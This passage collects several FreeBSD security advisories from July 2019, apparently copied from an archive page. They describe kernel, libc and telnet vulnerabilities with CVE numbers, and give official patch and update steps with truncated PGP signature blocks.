revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5604> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:16.bhyve.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl04WmtfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cI+Jw//TcrKrFaXkEJtqzspjoeK9YKwNwj30ewdb/Ph3GdcgVoQmfJVsWPcmcM9 +dewKdl7gGLhVhoJ+3f3oFzlDcqSxFLHcNwSW5J7P8Zt+7ZpQzwH8pfB6S8T1Nk6 77Sv5hYrjy8kdSh6Z/c8BkAQrhEFYO09xej8ekQ1B+iL2N4ErexpCNTMKlP96pGS 0/4tso5gdcwrc1t6HHGffFkjItgnE8Lvgr1ZsSHbcRGAc3nqy3n21U+VH+fecAzK 0NBO3HQeCbRIEdAms3jMLcAJGrs60VBN0nnWqLxlGBb10hY7Si0NkgbWOP2g/Elf J+K4SHTFXbhIGrpsrEdvSVPvytQ8gKOSys5luvtLjt0Yhll08eEUDVzaIk//Hsak BcUSlKHULLkVTJZvdZAHUMHJOMPpSAh61DuFcM+pxAt5E9rmgX+HnPBs1yLbgd23 NaQadFC126T+AW5W5GyOs2BIEo4bdTNHqONF7gmR4a5bv6/7GWZz/QNsep43jDZH 43lur9mts+/1LUCD1s4DkMniNMaGt28GMNa44PgQV
FreeBSD Security Advisory FreeBSD-SA-19:17.fd
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:17.fd Security Advisory The FreeBSD Project Topic: File description reference count leak Category: core Module: unix Announced: 2019-07-24 Credits:Mark Johnston Affects:All supported versions of FreeBSD. Corrected: 2019-07-22 19:25:05 UTC (stable/12, 12.0-STABLE) 2019-07-24 12:57:49 UTC (releng/12.0, 12.0-RELEASE-p8) 2019-07-22 19:27:23 UTC (stable/11, 11.2-STABLE) 2019-07-24 12:57:49 UTC (releng/11.2, 11.2-RELEASE-p12) 2019-07-24 12:57:49 UTC (releng/11.3, 11.3-RELEASE-p1) CVE Name: CVE-2019-5607 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background UNIX-domain sockets are used for inter-process communication. It is possible to use UNIX-domain sockets to transfer rights, encoded as file descriptors, to another process. Rights are encapsulated in control messages, and multiple such messages may be transmitted with a single system call. II. Problem Description If a process attempts to transmit rights over a UNIX-domain socket and an error causes the attempt to fail, references acquired on the rights are not released and are leaked. This bug can be used to cause the reference counter to wrap around and free the corresponding file structure. III. Impact A local user can exploit the bug to gain root privileges or escape from a jail. IV. Workaround No workaround is available. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +10min "Rebooting for a security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 11.2] # fetch https://security.FreeBSD.org/patches/SA-19:17/fd.11.2.patch # fetch https://security.FreeBSD.org/patches/SA-19:17/fd.11.2.patch.asc # gpg --verify fd.11.2.patch.asc [FreeBSD 11.3] # fetch https://security.FreeBSD.org/patches/SA-19:17/fd.11.patch # fetch https://security.FreeBSD.org/patches/SA-19:17/fd.11.patch.asc # gpg --verify fd.11.patch.asc [FreeBSD 12.0] # fetch https://security.FreeBSD.org/patches/SA-19:17/fd.12.patch # fetch https://security.FreeBSD.org/patches/SA-19:17/fd.12.patch.asc # gpg --verify fd.12.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r350222 releng/12.0/ r350286 stable/11/r350223 releng/11.2/ r350286 releng/11.3/ r350286 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5607> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:17.fd.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl04WnBfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cIOTQ/+KQMGXwNiuMVNib5ErewD9QdT48NYaU/hYUub3VMAfQltvWmbiPw7zXj7 yJGm9FxWrMvZ6hFnKskV60u9d7PMYkOv4nzcaFgPoadByXXlALQGd/ansrZFyTJr b
FreeBSD Security Advisory FreeBSD-SA-19:15.mqueuefs
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:15.mqueuefs Security Advisory The FreeBSD Project Topic: Reference count overflow in mqueue filesystem Category: core Module: kernel Announced: 2019-07-24 Credits:Mateusz Guzik Affects:All supported versions of FreeBSD. Corrected: 2019-07-23 21:12:32 UTC (stable/12, 12.0-STABLE) 2019-07-24 12:55:16 UTC (releng/12.0, 12.0-RELEASE-p8) 2019-07-23 21:15:28 UTC (stable/11, 11.2-STABLE) 2019-07-24 12:55:16 UTC (releng/11.2, 11.2-RELEASE-p12) 2019-07-24 12:55:16 UTC (releng/11.3, 11.3-RELEASE-p1) CVE Name: CVE-2019-5603 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background mqueuefs(5) implements POSIX message queue file system which can be used by processes as a communication mechanism. 'struct file' represents open files, directories, sockets and other entities. II. Problem Description System calls operating on file descriptors obtain a reference to relevant struct file which due to a programming error was not always put back, which in turn could be used to overflow the counter of affected struct file. III. Impact A local user can use this flaw to obtain access to files, directories, sockets etc. opened by processes owned by other users. If obtained struct file represents a directory from outside of user's jail, it can be used to access files outside of the jail. If the user in question is a jailed root they can obtain root privileges on the host system. IV. Workaround No workaround is available. Note that the mqueuefs file system is not enabled by default. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +10min "Security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:15/mqueuefs.patch # fetch https://security.FreeBSD.org/patches/SA-19:15/mqueuefs.patch.asc # gpg --verify mqueuefs.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r350261 releng/12.0/ r350284 stable/11/r350263 releng/11.2/ r350284 releng/11.3/ r350284 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5603> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:15.mqueuefs.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl04WmdfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cIWpBAAg9BmPamkj7wLJODR8SvNk+qYqEbYeakiSGnvXllz2l+qI2dhMVsuQRGQ ko7VY0P2Wuh68UiiDG63Oq3hbOWPPkL1axk6n275rZSdoVj856tjrHjnUtP3UX5S WQUKRAREjhVjM9dAOwCYrmAmcpX4SkslklhfiR6AR62t4eptMlfJ6ACQATs6FPnX WRdyDe7yq0mL4UHWg+PvotQ+rxGiynwgVRMXwaglKOldGOuPOeuj7azM4nb6/qkN GjJlJOIRwfU1/sXVII3cCzndnCrz5A0sSttg
FreeBSD Security Advisory FreeBSD-SA-19:14.freebsd32
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:14.freebsd32 Security Advisory The FreeBSD Project Topic: Kernel memory disclosure in freebsd32_ioctl Category: core Module: kernel Announced: 2019-07-24 Credits:Ilja van Sprundel, IOActive Affects:FreeBSD 11.2 and FreeBSD 11.3 Corrected: 2019-07-22 18:14:34 UTC (stable/11, 11.2-STABLE) 2019-07-24 12:54:10 UTC (releng/11.2, 11.2-RELEASE-p12) 2019-07-24 12:54:10 UTC (releng/11.3, 11.3-RELEASE-p1) CVE Name: CVE-2019-5605 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The FreeBSD kernel supports executing 32-bit applications on a 64-bit kernel, including the ioctl(2) interface. II. Problem Description Due to insufficient initialization of memory copied to userland in the components listed above small amounts of kernel memory may be disclosed to userland processes. III. Impact A user who can invoke 32-bit FreeBSD ioctls may be able to read the contents of small portions of kernel memory. Such memory might contain sensitive information, such as portions of the file cache or terminal buffers. This information might be directly useful, or it might be leveraged to obtain elevated privileges in some way; for example, a terminal buffer might include a user-entered password. IV. Workaround No workaround is available. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +10min "Security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:14/freebsd32.patch # fetch https://security.FreeBSD.org/patches/SA-19:14/freebsd32.patch.asc # gpg --verify freebsd32.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/11/r350217 releng/11.2/ r350283 releng/11.3/ r350283 - - Note: This issue was addressed in a different way prior to the branch point for stable/12. As such, no patch is needed for FreeBSD 12.x. To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5605> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:14.freebsd32.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl04WmNfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cIavw//emdRXVNpGREW1FfUvWmUPpdgk6rFck9nEG0KUKYCcfhqN83BN9XtqaWu lBQ1jbB/CsalwL6Gpn2yuMvgS8W4yUidyPHLpzuoAThlsy5bHID1/oRftJt0T0BS kHbTD0tTUt3QDV51FoLBjvXfjRRb8xJ+wIGJ0NzOscWgjgu6JPUysHEJD3+vSOKN X3qJd3zcoYqswcvuhoVE2cFrSaZKEyIi1pJVr9CGItQTWXIisgdXdGYTnBdZU8jq iJGaI1BXiNUl/p/21JA32T+ZD7cdMtx6KiuoKlY7Bzgj7Qk3XW7xsQsYu724LIJT pVhIxntMrQSak7wIaqNPGR/FgkkKDsoo6iCHXlGxXv6tLg7pnioZIaHhc5+UZqmT 8I0UogWhQZS03/nwFRVDLPp+ka2P0g2gsm/dX1UVuucMT+hGeqn2c/iaSU76duoR qavRPjLPJDnfVrpXhpqco9rq1+UwA/1uSNe0cFX0ArX040hCReDsMphcxgrkZ0sD u71Px2ZLE5rpWmFd8LD0X2y1l4OEcTmoTPUtJxHlVrMFztuNbAlRnyCxTV8c2uId zN44wRj6c2ZEV/w+kBVTV+L7NSt1eHDZ5tgUL7b
FreeBSD Security Advisory FreeBSD-SA-19:12.telnet
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:12.telnet Security Advisory The FreeBSD Project Topic: telnet(1) client multiple vulnerabilities Category: contrib Module: contrib/telnet Announced: 2019-07-24 Credits:Juniper Networks Affects:All supported versions of FreeBSD. Corrected: 2019-07-19 15:37:29 UTC (stable/12, 12.0-STABLE) 2019-07-24 12:51:52 UTC (releng/12.0, 12.0-RELEASE-p8) 2019-07-19 15:27:53 UTC (stable/11, 11.2-STABLE) 2019-07-24 12:51:52 UTC (releng/11.2, 11.2-RELEASE-p12) 2019-07-24 12:51:52 UTC (releng/11.3, 11.3-RELEASE-p1) CVE Name: CVE-2019-0053 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The telnet(1) command is a TELNET protocol client, used primarily to establish terminal sessions across a network. II. Problem Description Insufficient validation of environment variables in the telnet client supplied in FreeBSD can lead to stack-based buffer overflows. A stack- based overflow is present in the handling of environment variables when connecting via the telnet client to remote telnet servers. This issue only affects the telnet client. Inbound telnet sessions to telnetd(8) are not affected by this issue. III. Impact These buffer overflows may be triggered when connecting to a malicious server, or by an active attacker in the network path between the client and server. Specially crafted TELNET command sequences may cause the execution of arbitrary code with the privileges of the user invoking telnet(1). IV. Workaround Do not use telnet(1) to connect to untrusted machines or over an untrusted network. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:12/telnet.patch # fetch https://security.FreeBSD.org/patches/SA-19:12/telnet.patch.asc # gpg --verify telnet.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in https://www.FreeBSD.org/handbook/makeworld.html>. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r350139 releng/12.0/ r350281 stable/11/r350140 releng/11.2/ r350281 releng/11.3/ r350281 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0053> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:12.telnet.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl04WltfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cLOzA//YxRZNUr+d8B+t6DnBUbVvthJiY9sQ1YPXUIJmp4QA7wvXr5UjURw+6qv raxEp6JmF06wZK4RjeIFckQD6s2wnjO5VHO80Zbs0nD4NejQGeDAIlVdKqofOtJv bBQNSY3vPAtumyfElc+N19rKetAjGbsUjOMbn87GlWrit4lqcavBQsdmSlQB5gVA dFAFsVxr+ujjATnrCmIpFiaDk0unyJ7Gtz7jiM9I8xZueJtM49/9kNCFFLKCMUl8 HpB2k0cb18GVNJoKtzo1nELOM/oIJVO5HZt1fmYG/RgeL1BSyzg4q/5
FreeBSD Security Advisory FreeBSD-SA-19:13.pts
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:13.ptsSecurity Advisory The FreeBSD Project Topic: pts(4) write-after-free Category: core Module: kernel Announced: 2019-07-24 Credits:syzkaller Affects:All supported versions of FreeBSD. Corrected: 2019-07-07 14:19:46 UTC (stable/12, 12.0-STABLE) 2019-07-24 12:53:06 UTC (releng/12.0, 12.0-RELEASE-p8) 2019-07-07 14:20:14 UTC (stable/11, 11.2-STABLE) 2019-07-24 12:53:06 UTC (releng/11.2, 11.2-RELEASE-p12) 2019-07-24 12:53:06 UTC (releng/11.3, 11.3-RELEASE-p1) CVE Name: CVE-2019-5606 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The posix_openpt(2) system call allocates a pseudo-terminal device and returns a descriptor referencing that device. Such a descriptor may be configured such that a SIGIO signal will be sent to a designated process or process group when the device is ready to perform I/O. II. Problem Description The code which handles a close(2) of a descriptor created by posix_openpt(2) fails to undo the configuration which causes SIGIO to be raised. This bug can lead to a write-after-free of kernel memory. III. Impact The bug permits malicious code to trigger a write-after-free, which may be used to gain root privileges or escape a jail. IV. Workaround No workaround is available. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +10min "Security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:13/pts.patch # fetch https://security.FreeBSD.org/patches/SA-19:13/pts.patch.asc # gpg --verify pts.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r349805 releng/12.0/ r350282 stable/11/r349806 releng/11.2/ r350282 releng/11.3/ r350282 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5606> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:13.pts.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl04Wl9fFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cLZDA//SGC+7Vghtofm/CzylIXhC1drFOxNYJOF7KEJqDwsRR3U9S99Q9NBWS5+ e+/vJzvV0+epZNQXDlit5a76jGwy4fNuutNh0J3APHe/l0Zp/PhM56IwRWQgqAkQ hF67xhHxFZs8AH6/bw21N4IkRrAZHmrrCY8ubZArjoUi0gCoFzAYRw1Nh/JTQoLS IGuqUFaMZWKvu3aeJiikLjHiJUMRAY7sxh+iSBSp99dsLkASqQZtx1grmosljttN fuD7qO2f067EWUpC50JTbNt9V7za854hrlOp8jn1g51O4fWWJoEEL2/0VUeOO+fr aGS9UNal25NPr2zGzx2t0u1VNE3/YKoZ0tq+mQYtaXke32ZO15Ufby0YcLU4DF8d dU1ZoG2AGbWmBqgQ982hocq5Dn0r5yCHXDeEGguE1DsfyBuUEZw6zfYRtzIQ0swk wDrdETxpIMa8jaSGtDw2bilrLNRIVqYkXBJftC3fpXhlz6PyU6bZaFm00xrs7z1D EJMkuIWho9oMqLTU7bZNHv7JD4G3ziTF1h2tGXGcEKp02ImNZQnw3w5PBberFgto H4uJQCWgFqqddkjnSidX3Uj676LC99ERDEUl
FreeBSD Security Advisory FreeBSD-SA-19:10.ufs
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:10.ufsSecurity Advisory The FreeBSD Project Topic: Kernel stack disclosure in UFS/FFS Category: core Module: Kernel Announced: 2019-07-02 Credits:David G. Lawrence Affects:All supported versions of FreeBSD. Corrected: 2019-05-10 23:45:16 UTC (stable/12, 12.0-STABLE) 2019-07-02 00:02:16 UTC (releng/12.0, 12.0-RELEASE-p7) 2019-05-10 23:46:42 UTC (stable/11, 11.2-STABLE) 2019-07-02 00:02:16 UTC (releng/11.2, 11.2-RELEASE-p11) CVE Name: CVE-2019-5601 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The Berkeley Fast File System (FFS) is an implementation of the UNIX File System (UFS) filesystem used by FreeBSD. II. Problem Description A bug causes up to three bytes of kernel stack memory to be written to disk as uninitialized directory entry padding. This data can be viewed by any user with read access to the directory. Additionally, a malicious user with write access to a directory can cause up to 254 bytes of kernel stack memory to be exposed. III. Impact Some amount of the kernel stack is disclosed and written out to the filesystem. IV. Workaround No workaround is available but systems not using UFS/FFS are not affected. V. Solution Special note: This update also adds the -z flag to fsck_ffs to have it scrub the leaked information in the name padding of existing directories. It only needs to be run once on each UFS/FFS filesystem after a patched kernel is installed and running. Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterwards, reboot the system and run: # fsck -t ufs -f -p -T ufs:-z to clean up your existing filesystems. 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 12.x] # fetch https://security.FreeBSD.org/patches/SA-19:10/ufs.12.patch # fetch https://security.FreeBSD.org/patches/SA-19:10/ufs.12.patch.asc # gpg --verify ufs.12.patch.asc [FreeBSD 11.x] # fetch https://security.FreeBSD.org/patches/SA-19:10/ufs.11.patch # fetch https://security.FreeBSD.org/patches/SA-19:10/ufs.11.patch.asc # gpg --verify ufs.11.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system and run: # fsck -t ufs -f -p -T ufs:-z to clean up your existing filesystems. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r347474 releng/12.0/ r349623 stable/11/r347475 releng/11.2/ r349623 - - Note: This patch was applied to the stable/11 branch before the branch point for releng/11.3. As such, no patch is needed for any 11.3-BETA or -RC. To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5601> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:10.ufs.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl0b9WVfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cJgRhAAic+yb4boY5k2TotBe9x
FreeBSD Security Advisory FreeBSD-SA-19:11.cd_ioctl
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:11.cd_ioctl Security Advisory The FreeBSD Project Topic: Privilege escalation in cd(4) driver Category: core Module: kernel Announced: 2019-07-02 Credits:Alex Fortune Affects:All supported versions of FreeBSD. Corrected: 2019-07-03 00:11:31 UTC (stable/12, 12.0-STABLE) 2019-07-02 00:03:55 UTC (releng/12.0, 12.0-RELEASE-p7) 2019-07-03 00:12:50 UTC (stable/11, 11.3-PRERELEASE) 2019-07-02 00:03:55 UTC (releng/11.3, 11.3-RC3-p1) 2019-07-02 00:03:55 UTC (releng/11.2, 11.2-RELEASE-p11) CVE Name: CVE-2019-5602 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The cd(4) driver implements a number of ioctls to permit low-level access to the media in the CD-ROM device. The Linux emulation layer provides a corresponding set of ioctls, some of which are implemented as wrappers of native cd(4) ioctls. These ioctls are available to users in the operator group, which gets read-only access to cd(4) devices by default. II. Problem Description To implement one particular ioctl, the Linux emulation code used a special interface present in the cd(4) driver which allows it to copy subchannel information directly to a kernel address. This interface was erroneously made accessible to userland, allowing users with read access to a cd(4) device to arbitrarily overwrite kernel memory when some media is present in the device. III. Impact A user in the operator group can make use of this interface to gain root privileges on a system with a cd(4) device when some media is present in the device. IV. Workaround devfs.conf(5) and devfs.rules(5) can be used to remove read permissions from cd(4) devices. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterwards, reboot the system. 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 12.x] # fetch https://security.FreeBSD.org/patches/SA-19:11/cd_ioctl.12.patch # fetch https://security.FreeBSD.org/patches/SA-19:11/cd_ioctl.12.patch.asc # gpg --verify cd_ioctl.12.patch.asc [FreeBSD 11.x] # fetch https://security.FreeBSD.org/patches/SA-19:11/cd_ioctl.11.patch # fetch https://security.FreeBSD.org/patches/SA-19:11/cd_ioctl.11.patch.asc # gpg --verify cd_ioctl.11.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r349628 releng/12.0/ r349625 stable/11/r349629 releng/11.3/ r349625 releng/11.2/ r349625 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5602> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:11.cd_ioctl.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl0b9WtfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1Qz
FreeBSD Security Advisory FreeBSD-SA-19:09.iconv
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:09.iconv Security Advisory The FreeBSD Project Topic: iconv buffer overflow Category: core Module: libc Announced: 2019-07-02 Credits:Andrea Venturoli , NetFence Affects:All supported versions of FreeBSD. Corrected: 2019-07-03 00:01:38 UTC (stable/12, 12.0-STABLE) 2019-07-03 00:00:39 UTC (releng/12.0, 12.0-RELEASE-p7) 2019-07-03 00:03:14 UTC (stable/11, 11.3-PRERELEASE) 2019-07-03 00:00:39 UTC (releng/11.3, 11.3-RC3-p1) 2019-07-03 00:00:39 UTC (releng/11.2, 11.2-RELEASE-p11) CVE Name: CVE-2019-5600 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The iconv(3) API converts text data from one character encoding to another and is available as part of the standard C library (libc). II. Problem Description With certain inputs, iconv may write beyond the end of the output buffer. III. Impact Depending on the way in 